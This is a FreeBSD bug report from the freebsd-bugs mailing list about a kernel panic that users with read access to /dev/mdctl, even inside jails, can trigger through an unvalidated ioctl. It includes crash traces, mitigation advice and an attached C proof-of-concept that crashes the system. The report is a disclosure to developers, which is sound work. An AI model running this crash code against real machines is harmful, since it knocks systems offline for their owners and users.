From owner-freebsd-bugs@FreeBSD.ORG Fri Jul 6 16:40:04 2012 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 4CDD71065673 for ; Fri, 6 Jul 2012 16:40:04 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id 21D728FC14 for ; Fri, 6 Jul 2012 16:40:04 +0000 (UTC) Received: from freefall.freebsd.org (localhost [127.0.0.1]) by freefall.freebsd.org (8.14.5/8.14.5) with ESMTP id q66Ge3kl024116 for ; Fri, 6 Jul 2012 16:40:03 GMT (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.14.5/8.14.5/Submit) id q66Ge3a2024115; Fri, 6 Jul 2012 16:40:03 GMT (envelope-from gnats) Resent-Date: Fri, 6 Jul 2012 16:40:03 GMT Resent-Message-Id: <201207061640.q66Ge3a2024115@freefall.freebsd.org> Resent-From: FreeBSD-gnats-submit@FreeBSD.org (GNATS Filer) Resent-To: freebsd-bugs@FreeBSD.org Resent-Reply-To: FreeBSD-gnats-submit@FreeBSD.org, Filip Palian Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id A2B4A106566C for ; Fri, 6 Jul 2012 16:32:11 +0000 (UTC) (envelope-from nobody@FreeBSD.org) Received: from red.freebsd.org (red.freebsd.org [IPv6:2001:4f8:fff6::22]) by mx1.freebsd.org (Postfix) with ESMTP id 8DD9D8FC12 for ; Fri, 6 Jul 2012 16:32:11 +0000 (UTC) Received: from red.freebsd.org (localhost [127.0.0.1]) by red.freebsd.org (8.14.4/8.14.4) with ESMTP id q66GWAQ6021895 for ; Fri, 6 Jul 2012 16:32:11 GMT (envelope-from nobody@red.freebsd.org) Received: (from nobody@localhost) by red.freebsd.org (8.14.4/8.14.4/Submit) id q66GWAfw021894; Fri, 6 Jul 2012 16:32:10 GMT (envelope-from nobody) Message-Id: <201207061632.q66GWAfw021894@red.freebsd.org> Date: Fri, 6 Jul 2012 16:32:10 GMT From: Filip Palian To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-3.1 Cc: Subject: misc/169683: System crash via ioctl() on mdctl. X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 06 Jul 2012 16:40:04 -0000 >Number: 169683 >Category: misc >Synopsis: System crash via ioctl() on mdctl. >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Fri Jul 06 16:40:03 UTC 2012 >Closed-Date: >Last-Modified: >Originator: Filip Palian >Release: FreeBSD 9.0-RELEASE #0 >Organization: >Environment: FreeBSD fbsd 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:14:25 UTC 2012 root@obrian.cse.buffalo.edu:/usr/obj/usr/src/sys/GENEREIC i386 >Description: User who has read permission on "/dev/mdctl" is able to crash the system (also within the jail if only provided by devfs(.rules)) via ioctl() handler in "/usr/src/sys/dev/md/md.c:1127". The crash occures in function bcopy() (md.c:491) called in mdstart_preload() (md.c:493). Some detailed information included below. -- cut -- fbsd dumped core - see /var/crash/vmcore.0 .. panic: page fault .. Unread portion of the kernel message buffer: Fatal trap 12: page fault while in kernel mode cpuid = 0; apic id = 00 fault virtual address = 0xd550ba7a fault code = supervisor read, page not present instruction pointer = 0x20:0xc0d46bfe stack pointer = 0x28:0xd8e13ca0 frame pointer = 0x28:0xd8e13cbc code segment = base 0x0, limit 0xfffff, type 0x1b = DPL 0, pres 1, def32 1, gran 1 processor eflags = interrupt enabled, resume, IOPL = 0 current process = 3154 (md671657984) trap number = 12 panic: page fault cpuid = 0 KDB: stack backtrace: #0 0xc0a4b157 at kdb_backtrace+0x47 #1 0xc0a186b7 at panic+0x117 #2 0xc0d48cf3 at trap_fatal+0x323 #3 0xc0d48fa0 at trap_pfault+0x2a0 #4 0xc0d49b35 at trap+0x465 #5 0xc0d32a8c at calltrap+0x6 #6 0xc0731b12 at md_kthread+0x232 #7 0xc09ea997 at fork_exit+0x97 #8 0xc0d32b04 at fork_trampoline+0x8 Uptime: 9h48m43s Physical memory: 1007 MB Dumping 108 MB: 93 77 61 45 29 13 -- # nm -n /usr/obj/usr/src/sys/GENERIC/kernel.debug |grep c0d46b c0d46b28 T bzero c0d46b44 T sse2_pagezero c0d46b64 T i686_pagezero c0d46ba4 T fillw c0d46bb8 T bcopyb c0d46be4 T bcopy <--- paniced here on $esi (0xd550ba7a) -- (kgdb) bt #0 doadump (textdump=1) at pcpu.h:244 #1 0xc0a1845a in kern_reboot (howto=260) at /usr/src/sys/kern/kern_shutdown.c:442 #2 0xc0a186f1 in panic (fmt=Variable "fmt" is not available. ) at /usr/src/sys/kern/kern_shutdown.c:607 #3 0xc0d48cf3 in trap_fatal (frame=0xd8e13c60, eva=3578837626) at /usr/src/sys/i386/i386/trap.c:975 #4 0xc0d48fa0 in trap_pfault (frame=0xd8e13c60, usermode=0, eva=3578837626) at /usr/src/sys/i386/i386/trap.c:888 #5 0xc0d49b35 in trap (frame=0xd8e13c60) at /usr/src/sys/i386/i386/trap.c:558 #6 0xc0d32a8c in calltrap () at /usr/src/sys/i386/i386/exception.s:168 #7 0xc0d46bfe in bcopy () at /usr/src/sys/i386/i386/support.s:196 Previous frame inner to this frame (corrupt stack?) -- cut -- >How-To-Repeat: Compile and execute the code from the attachment. >Fix: Validate input data from user to xmdctlioctl() in ""/usr/src/sys/dev/md/md.c". To prevent evil users from doing bad things administrators should ensure, that "/dev/mdctl" permissions are +rw (600) only for root. For servers where jails are provided for untrusted users (e.g. hosting companies) access to "/dev/mdctl" device should be forbidden/hidden using defvs.rules. Patch attached with submission follows: #include #include #include #include #include #include #include #include #include int main() { int f; struct md_ioctl s; struct stat ss; s.md_version = MDIOVERSION; //s.md_type = MD_PRELOAD; s.md_type = MD_MALLOC; /* this one becomes sc->pl_ptr */ s.md_base = 0x41414141-0x200; if (stat("/dev/mdctl", &ss) != 0) { printf("stat(\"/dev/mdctl\") failed: %s\n", strerror(errno)); exit (0); } f = open("/dev/mdctl", O_RDONLY, 0); printf("say goodnight...\n"); if (ioctl(f, MDIOCATTACH, &s) < 0) printf("ioctl(MDIOCATTACH) failed: %s\n", strerror(errno)); printf("no +r no fun\n"); exit (0); } >Release-Note: >Audit-Trail: >Unformatted: